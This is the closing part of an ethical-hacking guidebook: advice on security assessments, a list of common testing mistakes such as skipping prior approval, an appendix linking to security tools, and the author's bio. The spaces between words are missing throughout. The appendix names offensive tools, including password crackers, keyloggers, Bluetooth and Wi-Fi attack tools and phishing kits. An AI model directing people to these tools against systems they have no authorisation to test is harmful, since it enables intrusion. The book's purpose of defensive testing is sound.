SecurityAssessmentsImprovetheUnderstandingofBusinessThreats
Youcansaypasswordsareweakorpatchesaremissing,butactuallyexploitingsuchflawsandshowingtheoutcomearequitedifferentmatters.There’snobetterwaytoprovethere’saproblemandmotivatemanagementtodosomethingaboutitthanbyshowingtheoutcomesofthetestingmethodsthatIoutlineinthisbook.
IfaBreachOccurs,YouHaveSomethingtoFallBackOn
Intheeventamaliciousinsiderorexternalattackerstillbreachesyoursecurity,yourbusinessissued,oryourbusinessfallsoutofcompliancewithlawsorregulations,themanagementteamcanatleastdemonstratethatitwasperformingitsduecaretouncoversecurityrisksthroughthepropertesting.Arelatedareathatcanbeproblematicisknowingaboutaproblemandnotfixingit.Thelastthingyouneedisalawyerandhisexpertwitnesspointingouthowyourbusinesswaslaxintheareaofinformationsecuritytestingorfollow-through.That’saroadyoudon’twanttogodown.
In-DepthTestingBringsOuttheWorstinYourSystems
Someonewalkingarounddoingaself-assessmentorhigh-levelauditcanfindsecurity“bestpractices”you’remissing,butheisn’tgoingtofindmostofthesecurityflawsthatin-depthsecurityvulnerabilityandpenetrationtestingisgoingtouncover.ThetestingmethodsIoutlineinthisbookwillbringoutthewartsandall.
CombiningtheBestofPenetrationTestingandVulnerabilityAssessmentsIsWhatYouNeed
Penetrationtestingisrarelyenoughtofindeverythinginyoursystemsbecausethescopeoftraditionalpenetrationtestingissimplytoolimited.Thesamegoesforvulnerabilityassessments,especiallythosethatmostlyinvolvebasicvulnerabilityscans.Whenyoucombineboth,yougetthemostbangforyourbuck.
ProperTestingCanUncoverWeaknessesThatMightGoOverlookedforYears
Performingthepropersecurityassessmentsnotonlyuncoverstechnical,physical,andhumanweaknesses,buttheycanalsorevealproblemswithITandsecurityoperations,suchaspatchmanagement,changemanagement,andlackofuserawareness,whichmaynotbefoundotherwiseoruntilit’stoolate.
TenDeadlyMistakesMakingthewrongchoicesinyoursecuritytestingcanwreakhavoconyourwork,possiblyevenyourcareer.Inthischapter,Idiscusstenpotentialpitfallstobekeenlyawareofwhenperformingyoursecurityassessmentwork.
NotGettingPriorApprovalGettingdocumentedapprovalinadvance,suchasane-mail,aninternalmemo,oraformalcontractforyourethicalhackingefforts—whetherit’sfrommanagementorfromyourclient—isanabsolutemust.It’syour“GetOutofJailFree”card.
Allownoexceptionshere—especiallywhenyou’redoingworkforclients:Makesureyougetasignedcopyofthisdocumentforyourfilestomakesureyou’reprotected.
AssumingYouCanFindAllVulnerabilitiesDuringYourTests
Somanysecurityvulnerabilitiesexist—knownandunknown—thatyouwon’tfindthemallduringyourtesting.Don’tmakeanyguaranteesthatyou’llfindallthesecurityvulnerabilitiesinasystem.You’llbestartingsomethingthatyoucan’tfinish.
Sticktothefollowingtenets:
Berealistic.Usegoodtools.Gettoknowyoursystemsandpracticehoningyourtechniques.
IcovereachoftheseinvariousdepthsinChapters5through16.
AssumingYouCanEliminateAllSecurityVulnerabilities
Whenitcomestonetworks,computers,andapplications,100percent,ironcladsecurityisnotattainable.Youcan’tpossiblypreventallsecurityvulnerabilities,butyou’lldofineifyouuncoverthelow-hangingfruitthatcreatesmostoftheriskandaccomplishthesetasks:
Followsolidpractices—thesecurityessentialsthathavebeenaroundfordecades.Patchandhardenyoursystems.Applyreasonablesecuritycountermeasureswhereyoucanbasedonyourbudgetandyourbusinessneeds.
Manychapters,suchastheoperatingsystemchaptersinPartIV,covertheseareas.It’salsoimportanttorememberthatyou’llhaveunplannedcosts.Youmayfindlotsofsecurityproblemsandwillneedthebudgettoplugtheholes.Perhapsyounowhaveaduecareproblemonyourhandsandhavetofixtheissuesuncovered.Thisiswhyyouneedtoapproachinformationsecurityfromariskperspectiveandhavealltherightpeopleonboard.
PerformingTestsOnlyOnceSecurityassessmentsareameresnapshotofyouroverallstateofsecurity.Newthreatsandvulnerabilitiessurfacecontinually,soyoumustperformthesetestsperiodicallyandconsistentlytomakesureyoukeepupwiththelatestsecuritydefensesforyoursystems.Developbothshort-andlong-termplansforcarryingoutyoursecuritytestsoverthenextfewmonthsandnextfewyears.
ThinkingYouKnowItAllEventhoughsomeinthefieldofITwouldbegtodiffer,nooneworkinginITorinformationsecurityknowseverythingaboutthissubject.Keepingupwithallthesoftwareversions,hardwaremodels,andemergingtechnologies,nottomentiontheassociatedsecuritythreatsandvulnerabilities,isimpossible.TrueITandinformationsecurityprofessionalsknowtheirlimitations—thatis,theyknowwhattheydon’tknow.However,theydoknowwheretogetanswersthroughthemyriadofonlineresourcessuchasfromthoseI’velistedintheAppendix.
RunningYourTestsWithoutLookingatThingsfromaHacker’sViewpoint
Thinkabouthowamaliciousoutsiderorrogueinsidercanattackyournetworkandcomputers.Getafreshperspectiveandtrytothinkoutsidetheproverbialboxabouthowsystemscanbetakenoffline,informationcanbestolen,andsoforth.
Studycriminalandhackerbehaviorsandcommonhackattackssoyouknowwhattotestfor.I’mcontinuallybloggingaboutthissubjectathttp://securityonwheels.com/blog.CheckouttheAppendixforothertrustedresourcesthatcanhelpyouinthisarea.
NotTestingtheRightSystemsFocusonthesystemsandinformationthatmattermost.YoucanhackawayalldayatastandalonedesktoprunningWindowsXPoratatrainingroomprinterwithnothingofvalue,butdoesthatdoanygood?Probablynot.Butyouneverknow.Yourbiggestrisksmightbeontheseeminglyleastcriticalsystem.Focusonwhat’surgentandimportant.
NotUsingtheRightToolsWithouttherighttoolsforthetask,gettinganythingdonewithoutdrivingyourselfnutsisimpossible.It’snodifferentthanworkingaroundthehouse,onyourcar,orinyourgarden.Goodtoolsareanabsolutemust.Downloadthefreeandtrial-versiontoolsImentionthroughoutthisbookandintheAppendix.Buycommercialtoolswhenyoucan—they’reusuallywortheverypenny.Noonesecuritytooldoesitall,though.
Buildingyourtoolboxandgettingtoknowyourtoolswellwillsaveyougobsofeffort,you’llimpressotherswithyourresults,andyou’llhelpminimizeyourbusiness’srisks.
PoundingProductionSystemsattheWrongTime
Oneofthebestwaystotickoffyourmanagerorloseyourclient’strustistorunsecuritytestsagainstproductionsystemswheneveryoneisusingthem.Thisisespeciallytrueforthoserunningolder,morefeebleoperatingsystemsandapplications.Ifyoutrytotestsystemsatthewrongtime,expectthatthecriticalonesmaybenegativelyimpactedattheabsoluteworstmoment.Makesureyouknowthebesttimetoperformyourtesting.Itmightbeinthemiddleofthenight.(Ineversaidinformationsecuritytestingwaseasy!)Thismightbereasontojustifyusingsecuritytoolsandothersupportingutilitiesthatcanhelpautomatecertaintasks,suchasvulnerabilityscannersthatallowyoutorunscansatacertaintime.
OutsourcingTestingandNotStayingInvolved
Outsourcingisgreat,butyoumuststayinvolvedthroughouttheentireprocess.Don’thandoverthereinsofyoursecuritytestingtoathird-partyconsultantoramanagedserviceproviderwithoutfollowingupandstayingontopofwhat’stakingplace.Youwon’tbedoingyourmanagerorclientsanyfavorsbystayingoutofthethird-partyvendors’hair.Getintheirhair,unlessofcourse,it’sabaldpersonlikeme.ButyouknowwhatImean.Youcannotoutsourceaccountability,sostayintouch!
ToolsandResourcesTostayup-to-datewiththelatestandgreatestsecuritytestingtoolsandresources,youneedtoknowwheretoturn.Thisappendixcontainsmyfavoritesecuritysites,tools,resources,andmorethatyoucanbenefitfrominyourongoingsecurityassessmentprogram.
Thisbook’sonlineCheatSheetcontainslinkstoalltheonlinetoolsandresourceslistedinthisappendix.Checkitoutatwww.dummies.com/cheatsheet/hacking.
AdvancedMalwareBit9+CarbonBlackSecurityPlatform—www.bit9.com/solutions
DamballaFailsafe—www.damballa.com/solutions/damballa_failsafe.php
BluetoothBlooover—http://trifinite.org/trifinite_stuff_blooover.html
BlueScanner—http://sourceforge.net/projects/bluescanner
Bluesnarfer—www.alighieri.org/tools/bluesnarfer.tar.gz
BlueSniperrifle—www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html
BTScannerforXP—www.pentest.co.uk/src/btscanner_1_0_0.zip
CarWhisperer—http://trifinite.org/trifinite_stuff_carwhisperer.html
Smurf—www.gatefold.co.uk/smurf
CertificationsCertifiedEthicalHacker—www.eccouncil.org/CEH.htm
CertifiedInformationSecurityManager—www.isaca.org/Certification/CISM-Certified-Information-Security-Manager/Pages/default.aspx
CertifiedInformationSystemsSecurityProfessional—www.isc2.org/cissp/default.aspx
CertifiedWirelessSecurityProfessional—www.cwnp.com/certifications/cwsp
CompTIASecurity+—http://certification.comptia.org/getCertified/certifications/security.aspx
SANSGIAC—www.giac.org
DatabasesAdvancedOfficePasswordRecovery—www.elcomsoft.com/aopr.html
AdvancedSQLPasswordRecovery—www.elcomsoft.com/asqlpr.html
AppDetectivePro—www.trustwave.com/Products/Database-Security/AppDetectivePRO
ElcomSoftDistributedPasswordRecovery—www.elcomsoft.com/edpr.html
Idera—www.idera.com
MicrosoftSQLServer2008ManagementStudioExpress—www.microsoft.com/en-us/download/details.aspx?id=7593
Nexpose—www.rapid7.com/vulnerability-scanner.jsp
PeteFinnigan’slistingofOraclescanningtools—www.petefinnigan.com/tools.htm
QualysGuard—www.qualys.com
SQLPing3—www.sqlsecurity.com/downloads
DenialofServiceProtectionCloudFlare—www.cloudflare.com
DOSarrest—www.dosarrest.com
Incapsula—www.incapsula.com
ExploitsMetasploit—www.metasploit.com
OffensiveSecurity’sExploitDatabase—www.exploit-db.com
PwnieExpress—https://pwnieexpress.com
GeneralResearchToolsAFRINIC—www.afrinic.net
APNIC—www.apnic.net
ARIN—http://whois.arin.net/ui
Bing—www.bing.com
DNSstuff—www.dnsstuff.com
DNSTools—www.dnstools.com
TheFileExtensionSource—http://filext.com
Google—www.google.com
Googleadvancedoperators—www.googleguide.com/advanced_operators.html
Governmentdomains—www.dotgov.gov/portal/web/dotgov/whois
Hoover’sbusinessinformation—www.hoovers.com
LACNIC—www.lacnic.net
Netcraft’sWhat’sthatsiterunning?—http://netcraft.com
RIPENetworkCoordinationCentre—https://apps.db.ripe.net/search/query.html
Switchboard.com—www.switchboard.com
theHarvester—https://code.google.com/p/theharvester
UnitedStatesPatentandTrademarkOffice—www.uspto.gov
USSearch.com—www.ussearch.com
UnitedStatesSecuritiesandExchangeCommission—www.sec.gov/edgar.shtml
Whois—www.whois.net
WhatIsMyIP—www.whatismyip.com
Yahoo!Finance—http://finance.yahoo.com
Zabasearch—www.zabasearch.com
HackerStuff2600TheHackerQuarterly—www.2600.com
HackerT-shirts,equipment,andothertrinkets—www.thinkgeek.com
Hakin9—http://hakin9.org
(IN)SECUREMagazine—www.net-security.org/insecuremag.php
Phrack—www.phrack.org
TheJargonFile—www.jargon.8hz.com
KeyloggersKeyGhost—www.keyghost.com
SpectorSoft—www.spectorsoft.com
LawsandRegulationsComputerFraudandAbuseAct—www.fas.org/sgp/crs/misc/RS20830.pdf
DigitalMillenniumCopyrightAct(DMCA)—www.eff.org/issues/dmca
Gramm-Leach-BlileyAct(GLBA)SafeguardsRule—www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act
HealthInsurancePortabilityandAccountabilityAct(HIPAA)SecurityRule—www.hhs.gov/ocr/privacy/hipaa/understanding/srsummary.html
PaymentCardIndustryDataSecurityStandard(PCIDSS)—www.pcisecuritystandards.org/security_standards/index.php
UnitedStatesSecurityBreachNotificationLaws—www.ncsl.org/research/telecommunications-and-information-
technology/security-breach-notification-laws.aspx
LinuxBackTrackLinux—www.backtrack-linux.org
GFILanGuard—www.gfi.com/network-security-vulnerability-scanner
KaliLinux—www.kali.org
LinuxSecurityAuditingTool(LSAT)—http://usat.sourceforge.net
Nexpose—www.rapid7.com/vulnerability-scanner.jsp
QualysGuard—www.qualys.com
THC-Amap—www.thc.org/thc-amap
Tiger—www.nongnu.org/tiger
VarioustoolsatSourceForge—http://sourceforge.net
LiveToolkitsComprehensivelistingoflivebootableLinuxtoolkits—www.livecdlist.com
KaliLinux—www.kali.org
Knoppix—http://knoppix.net
NetworkSecurityToolkit—www.networksecuritytoolkit.org
SecurityToolsDistribution—http://s-t-d.org
LogAnalysisArcSightLogger—www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/index.html
GFIEventsManager—www.gfi.com/eventsmanager
MessagingBrutus—www.hoobie.net/brutus
Cain&Abel—www.oxid.it/cain.html
DNSstuffrelaychecker—www.dnsstuff.com
EICARAnti-Virustestfile—www.eicar.org/anti_virus_test_file.htm
GFIe-mailsecuritytest—www.gfi.com/pages/email-security.asp
mailsnarf—www.monkey.org/~dugsong/dsniff
theHarvester—https://github.com/laramies/theHarvester
smtpscan—www.freshports.org/security/smtpscan
Miscellaneous3MPrivacyFilters—www.shop3m.com/3m-privacy-filters.html
7-Zip—www.7-zip.org
SmartDraw—www.smartdraw.com
Visio—http://visio.microsoft.com/en-us/preview/default.aspx
WinZip—www.winzip.com
MobileBitLockerwhitepapers—www.principlelogic.com/bitlocker.html
CheckmarxCxDeveloper—www.checkmarx.com
ElcomSoftForensicDiskDecryptor—www.elcomsoft.com/efdd.html
ElcomSoft’sPhoneBreaker—www.elcomsoft.com/eppb.html
ElcomSoftSystemRecovery—www.elcomsoft.com/esr.html
iOSForensicToolkit—www.elcomsoft.com/eift.html
Ophcrack—http://ophcrack.sourceforge.net
OxygenForensicSuite—www.oxygen-forensic.com
PasswareKitForensic—www.lostpassword.com/kit-forensic.htm
Veracode—www.veracode.com
MicrosoftBitLockerAdministrationandMonitoring—https://technet.microsoft.com/en-us/windows/hh826072.aspx
NetworksArpwatch—http://linux.maruhn.com/sec/arpwatch.html
Blast—www.mcafee.com/us/downloads/free-tools/blast.aspx
Cain&Abel—www.oxid.it/cain.html
CommView—www.tamos.com/products/commview
dsniff—www.monkey.org/~dugsong/dsniff
EssentialNetTools—www.tamos.com/products/nettools
Fortinet—www.fortinet.com
Getif—www.wtcs.org/snmp4tpc/getif.htm
GFILanGuard—www.gfi.com/network-security-vulnerability-scanner
IKECrack—http://ikecrack.sourceforge.net
MACaddressvendorlookup—https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries
Nessusvulnerabilityscanner—www.tenable.com/products/nessus
Netcat—http://netcat.sourceforge.net
netfilter/iptables—www.netfilter.org
NetResident—www.tamos.com/products/netresident
NetScanToolsPro—www.netscantools.com
Nping—https://nmap.org/nping
Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp
Nmapportscanner—http://nmap.org
NMapWin—http://sourceforge.net/projects/nmapwin
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
Postlist—www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt
Portnumberlookup—www.cotse.com/cgi-bin/port.cgiPortSentry—http://sourceforge.net/projects/sentrytools
PromiscDetect—http://ntsecurity.nu/toolbox/promiscdetect
QualysGuardvulnerabilityscanner—www.qualys.com
SoftPerfectNetworkScanner—www.softperfect.com/products/networkscanner
SMACMACaddresschanger—www.klcconsulting.net/smac
SNARE—www.intersectalliance.com/projects/Snare
sniffdet—http://sniffdet.sourceforge.net
SonicWALL—www.sonicwall.com
SynfulKnockScanner—http://talosintel.com/scanner
TamoSoftEssentialNetTools—www.tamos.com/products/nettools
TrafficIQProfessional—www.idappcom.com
UDPFlood—www.mcafee.com/us/downloads/free-tools/udpflood.aspx
WhatIsMyIP—www.whatismyip.com
Wireshark—www.wireshark.org
PasswordCrackingAdvancedArchivePasswordRecovery—www.elcomsoft.com/archpr.html
BIOSpasswords—http://labmice.techtarget.com/articles/BIOS_hack.htm
BitLockersecuritywhitepapers—www.principlelogic.com/bitlocker.html
Brutus—www.hoobie.net/brutus
Cain&Abel—www.oxid.it/cain.html
Crack—ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack
Defaultvendorpasswords—www.cirt.net/passwords
Dictionaryfilesandwordlists
ftp://ftp.cerias.purdue.edu/pub/dict
https://packetstormsecurity.org/Crackers/wordlists
www.outpost9.com/files/WordLists.html
eBlasterandSpectorPro—www.spectorsoft.com
ElcomSoftDistributedPasswordRecovery—www.elcomsoft.com/edpr.html
ElcomSoftForensicDiskDecryptor—www.elcomsoft.com/efdd.html
ElcomSoftSystemRecovery—www.elcomsoft.com/esr.html
InvisibleKeyLoggerStealth—www.amecisco.com/iks.htm
JohntheRipper—www.openwall.com/john
KeyGhost—www.keyghost.com
LastPass—https://lastpass.com
NetBIOSAuditingTool—www.securityfocus.com/tools/543
NISTGuidetoEnterprisePasswordManagement—http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf
NTAccess—www.mirider.com/ntaccess.html
ophcrack—http://ophcrack.sourceforge.net
OxygenForensicSuite—www.oxygen-forensic.com
Pandora—www.nmrc.org/project/pandora
PasswareKitForensic—www.lostpassword.com/kit-forensic.htm
PasswordSafe—http://passwordsafe.sourceforge.net
ProactivePasswordAuditor—www.elcomsoft.com/ppa.html
ProactiveSystemPasswordRecovery—www.elcomsoft.com/pspr.html
Pwdump3—www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7
RainbowCrack—http://project-rainbowcrack.com
Rainbowtables—http://rainbowtables.shmoo.com
SQLPing3—www.sqlsecurity.com/downloads
THC-Hydra—www.thc.org/thc-hydra
WinHex—www.winhex.com
PatchManagementDebianLinuxSecurityAlerts—www.debian.org/security
DellKACESystemsManagementAppliance—http://software.dell.com/products/kace-k1000-systems-management-
appliance/patch-management-security.aspx
EcoraPatchManager—www.ecora.com/ecora/products/patchmanager.asp
GFILanGuard—www.gfi.com/network-security-vulnerability-scanner
IBMBigFix—www-03.ibm.com/security/bigfix
KDESoftwareUpdater—https://en.opensuse.org/System_Updates
LumensionPatchandRemediation—www.lumension.com/vulnerability-management/patch-management-software.aspx
ManageEngine—www.manageengine.com/products/desktop-central/linux-management.html
MicrosoftSecurityTechCenter—https://technet.microsoft.com/en-us/security/default.aspx
ShavlikPatch—www.shavlik.com/products/patch
SlackwareLinuxSecurityAdvisories—www.slackware.com/security
WindowsServerUpdateServicesfromMicrosoft—https://technet.microsoft.com/en-us/windowsserver/bb332157.aspx
SecurityEducationandLearningResources
KevinBeaver’sinformationsecurityarticles,whitepapers,webcasts,podcasts,andscreencasts—www.principlelogic.com/resources.html
KevinBeaver’sSecurityOnWheelsinformationsecurityaudioprograms—http://securityonwheels.com
KevinBeaver’sSecurityOnWheelsblog—http://securityonwheels.com/blog
KevinBeaver’sTwitterpage—https://twitter.com/kevinbeaver
SecurityMethodsandModelsOpenSourceSecurityTestingMethodologyManual—www.isecom.org/research/osstmm.html
OWASP—www.owasp.org
SecurITree—www.amenaza.com
TheOpenGroup’sFAIRRiskTaxonomy—www.opengroup.org/subjectareas/security/risk
SocialEngineringandPhishingCheckShortURL—www.checkshorturl.com
LUCY—http://phishing-server.com
SimplePhishingToolkit—https://github.com/sptoolkit/sptoolkit
SocialEngineerToolkit—www.trustedsec.com/social-engineer-toolkit
WhereDoesThisLinkGo?—http://wheredoesthislinkgo.com
StatisticsPrivacyRightsClearinghouseChronologyofDataBreaches—www.privacyrights.org/data-breach
VerizonDataBreachInvestigationsReport—www.verizonenterprise.com/DBIR
StorageEffectiveFileSearch—www.sowsoft.com/search.htm
FileLocatorPro—www.mythicsoft.com
IdentityFinder—www.identityfinder.com
SystemHardeningBastilleLinuxHardeningProgram—http://bastille-linux.sourceforge.net
CenterforInternetSecurityBenchmarks—www.cisecurity.org
DeepFreezeEnterprise—www.faronics.com/products/deep-freeze/enterprise
Fortres101—www.fortresgrand.com
Imperva—www.imperva.com/products/databasesecurity
LinuxAdministrator’sSecurityGuide—www.seifried.org/lasg
MicrosoftSecurityComplianceManager—https://technet.microsoft.com/en-us/library/cc677002.aspx
ServerDefender—www.port80software.com/products/serverdefender
SymantecPGP—www.symantec.com/products-solutions/families/?fid=encryption
WinMagic—www.winmagic.com
UserAwarenessandTrainingAwareityMOAT—www.awareity.com
DogwoodManagementPartnersSecurityPosters—www.securityposters.net
GreenideaVisibleStatement—www.greenidea.com
Interpact,Inc.AwarenessResources—www.thesecurityawarenesscompany.com
ManaginganInformationSecurityandPrivacyAwarenessandTrainingProgrambyRebeccaHerold(Auerbach)—www.amazon.com/Managing-Information-Security-Awareness-Training/dp/0849329639
PeterDavis&Associatestrainingservices—www.pdaconsulting.com/services.htm
SecurityAwareness,Inc.—www.securityawareness.com
VoiceoverIPCain&Abel—www.oxid.it/cain.html
CommView—www.tamos.com/products/commview
ListingofvariousVoIPtools—www.voipsa.org/Resources/tools.php
NIST’sSP800-58document—http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
PROTOS—www.ee.oulu.fi/research/ouspg/Protos
VoIPHopper—http://voiphopper.sourceforge.net
vomit—http://vomit.xtdnet.nl
VulnerabilityDatabasesCommonVulnerabilitiesandExposures—http://cve.mitre.org
CWE/SANSTop25MostDangerousProgrammingErrors—www.sans.org/top25-software-errors
NationalVulnerabilityDatabase—http://nvd.nist.gov
SANSCriticalSecurityContrils—www.sans.org/critical-security-controls
US-CERTVulnerabilityNotesDatabase—www.kb.cert.org/vuls
WebsitesandApplicationsAcunetixWebVulnerabilityScanner—www.acunetix.com
AppSpider—www.rapid7.com//products//appspider
Brutus—www.hoobie.net/brutus/index.html
BurpProxy—https://portswigger.net/burp/proxy.html
CheckmarxCxDeveloper—www.checkmarx.com
Defacedwebsites—http://zone-h.org/archive
FirefoxWebDeveloper—http://chrispederick.com/work/web-developer
Foundstone’sSASSHacmeTools—www.mcafee.com/us/downloads/free-tools/index.aspx
GoogleHackHoneypot—http://ghh.sourceforge.net
GoogleHackingDatabase—www.exploit-db.com/google-hacking-database
HTTrackWebsiteCopier—www.httrack.com
Netsparker—www.netsparker.com
ParosProxy—http://sourceforge.net/projects/paros
Port80Software’sServerMask—www.port80software.com/products/servermask
QualysSSLLabs—www.ssllabs.com
SiteDigger—www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
SQLInjectMe—https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me
SQLPowerInjector—www.sqlpowerinjector.com
THC-Hydra—www.thc.org/thc-hydra
Veracode—www.veracode.com
WebGoat—www.owasp.org/index.php/Category:OWASP_WebGoat_Project
WebInspect—www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html
WSDigger—www.mcafee.com/us/downloads/free-tools/wsdigger.aspx
WSFuzzer—www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
WindowsBitLockersecuritywhitepapers—www.principlelogic.com/bitlocker.html
DumpSec—www.systemtools.com/somarsoft/?somarsoft.com
GFILanGuard—www.gfi.com/network-security-vulnerability-scanner
MicrosoftBaselineSecurityAnalyzer—https://technet.microsoft.com/en-us/security/cc184924.aspx
NetworkUsers—www.optimumx.com/download/netusers.zip
Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp
QualysGuard—www.qualys.com
SoftPerfectNetworkScanner—www.softperfect.com/products/networkscanner
Sysinternals—https://technet.microsoft.com/en-us/sysinternals/default.aspx
Winfo—www.ntsecurity.nu/toolbox/winfo
WirelessNetworksAircrack-ng—http://aircrack-ng.org
AirMagnetWiFiAnalyzer—www.flukenetworks.com/enterprise-network/wireless-network/airmagnet-wifi-analyzer
Asleap—http://sourceforge.net/projects/asleap
CommViewforWiFi—www.tamos.com/products/commwifi
DigitalHotspotter—www.canarywireless.com
ElcomSoftWirelessSecurityAuditor—www.elcomsoft.com/ewsa.html
HomebrewWiFiantenna—www.turnpoint.net/wireless/has.html
Kismet—www.kismetwireless.net
NetStumbler—www.netstumbler.com
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
Reaver—https://code.google.com/p/reaver-wps
SuperCantenna—www.cantenna.com
Wellenreiter—http://sourceforge.net/projects/wellenreiter
WEPCrack—http://wepcrack.sourceforge.net
WiFinder—www.boingo.com/retail/#s3781
WiFiPineapple—www.wifipineapple.com/index.php
WiGLEdatabaseofwirelessnetworks—https://wigle.net
WinAirsnort—http://winairsnort.free.fr
AbouttheAuthorKevinBeaverisanindependentinformationsecurityconsultant,expertwitness,professionalspeaker,andwriterwithAtlanta-basedPrincipleLogic,LLC.HehasnearlythreedecadesofexperienceinITandover20yearsinsecurity.Kevinspecializesinperformingindependentinformationsecurityassessmentsforcorporations,securityproductvendors,softwaredevelopers/cloudserviceproviders,governmentagencies,andnonprofitorganizations.Beforestartinghisinformationsecurityconsultingpracticein2001,Kevinservedinvariousinformationtechnologyandsecurityrolesforseveralhealthcare,e-commerce,financial,andeducationalinstitutions.
KevinhasappearedonCNNtelevisionasaninformationsecurityexpertandhasbeenquotedinTheWallStreetJournal,Entrepreneur,FortuneSmallBusiness,Women'sHealth,andonInc.magazine’stechnologysite,IncTechnology.com.Kevin’sworkhasalsobeenreferencedbythePCICouncilintheirDataSecurityStandardWirelessGuidelines.Kevinhasbeenatop-ratedspeaker,givinghundredsofpresentationsandpaneldiscussionsforITandsecurityseminars,conferences,andwebcastsoverthepastdecadeandahalf.
Kevinhasauthoredorco-authored12informationsecuritybooks,includingHackingWirelessNetworksForDummies,ImplementationStrategiesforFulfillingandMaintainingITCompliance(Realtimepublishers.com),andThePracticalGuidetoHIPAAPrivacyandSecurityCompliance(Auerbach).Kevinhaswrittenmorethanthreedozenwhitepapersandover900articlesandguestblogpostsforsitessuchasTechTarget’sSearchSecurity.com,ZiffDavis’Toolbox.com,andIBM’sSecurityIntelligence.com.KevinisthecreatorandproduceroftheSecurityOnWheelsaudiobooks,whichprovidesecuritylearningforITprofessionalsonthego(securityonwheels.com),andtheSecurityOnWheelsblog(securityonwheels.com/blog).HealsocoversinformationsecurityandrelatedmattersonTwitter(@kevinbeaver)andYouTube(PrincipleLogic).Kevinearnedhisbachelor’sdegreeinComputerEngineeringTechnologyfromSouthernCollegeofTechnologyandhismaster’sdegreeinManagementofTechnologyfromGeorgiaTech.HehasobtainedhisCISSPcertificationin2001andalsoholdsMCSE,MasterCNE,andITProject+certifications.
Kevincanbereachedthroughhiswebsite,www.principlelogic.com,andyoucanconnecttohimviaLinkedInatwww.linkedin.com/in/kevinbeaver.
DedicationDad,thisone’sforyou.Iwouldn’tbeheretodaywithoutyourguidanceandsupport.You’vetaughtmesomuchaboutcommonsense—itsabsenceinmuchoftheworldandhowimportantitisforbeingsuccessfulnomatterwhattheendeavor.Iloveyouverymuch.
Author’sAcknowledgmentsIwanttothankAmy,Garrett,andMaryLinforyourlovingways,funnyjokes,andwillingnesstodealwithmynonsensedayinanddayout,especiallysinceI’vebeenworkingontheupdatestothisedition!Istillloveeachofyou100percent!
I’dalsoliketothankAmyFandrei,myacquisitionseditor,forcontinuingthisprojectandpresentingmetheopportunitytoshapethisbookintosomethingI’mveryproudof.I’dliketothankmyprojecteditor,KatharineDvorak.You’vebeenverypatientandgreattoworkwith!I’mlookingforwardtoworkingwithyouagaininthefuture.Also,manythankstomytechnicaleditor,businesscolleague,friend,andco-authorofHackingWirelessNetworksForDummies,PeterT.Davis.I’mhonored(asalways)tobeworkingwithyouandverymuchappreciateyourfeedbackonthisedition!IalsowanttoextendasincerethankstoRichardStiennon—I’mflatteredthatsuchastrongleaderinmyfieldwaswillingtowritetheForewordtothisbook.
MuchgratitudetoRobertAbelawithNetsparker;NateCrampton,RyanPoppa,AlanLipton,HDMoore,JustinWarren,andDanKuykendallwithRapid7;VladimirKatalovandOlgaKoksharovawithElcomSoft;CristianFlorianwithGFISoftware;MatySimanandAsaphSchulmanwithCheckmarx;DmitySuminwithPassware;KirkThomaswithNorthwestPerformanceSoftware;DavidVestwithMythicsoft;MichaelBergwithTamoSoft;TerryIngoldsbywithAmenazaTechnologies;andOlegFedorovwithOxygenSoftwareCompanyforrespondingtoallofmyrequests.ContinuedthankstoDaveCoeforyourhelpinkeepingmecurrentonthelatestsecuritytoolsandhacks!MuchgratitudetoalltheothersIforgottomentionaswell.
MegathankstoRushandDreamTheaterforyourinspirationalwordsanddrivingsoundstogetmethroughthenot-feeling-creativetimesworkingonthisedition!
Finally,Iwanttoexpressmysincereappreciationtomyclientsforcontinuingtohireme,the“no-name-brand”consultantwhoworksforhimself,andkeepingmearoundforthelongterm.Iwouldn’tbeherewithoutyourwillingnesstobreakoutofthe“musthirebigcompany”mindsetandyourcontinuedsupport.Thankyouverymuch!
Publisher’sAcknowledgmentsAcquisitionsEditor:AmyFandrei
ProjectEditor:KatharineDvorak
TechnicalEditor:PeterT.Davis
Sr.EditorialAssistant:CherieCase
ProductionEditor:KinsonRaja
CoverImage:DenisVrublevski/Shutterstock
Toaccessthecheatsheetspecificallyforthisbook,gotowww.dummies.com/cheatsheet/hacking.
Findout“HOW”atDummies.com
TakeDummieswithyoueverywhereyougo!
GotoourWebsite
LikeusonFacebook
FollowusonTwitter
WatchusonYouTube
JoinusonLinkedIn
PinusonPinterest
Circleusongoogle+
Subscribetoournewsletter
CreateyourownDummiesbookcover
ShopOnline
WILEYENDUSERLICENSEAGREEMENT
Gotowww.wiley.com/go/eulatoaccessWiley’sebookEULA.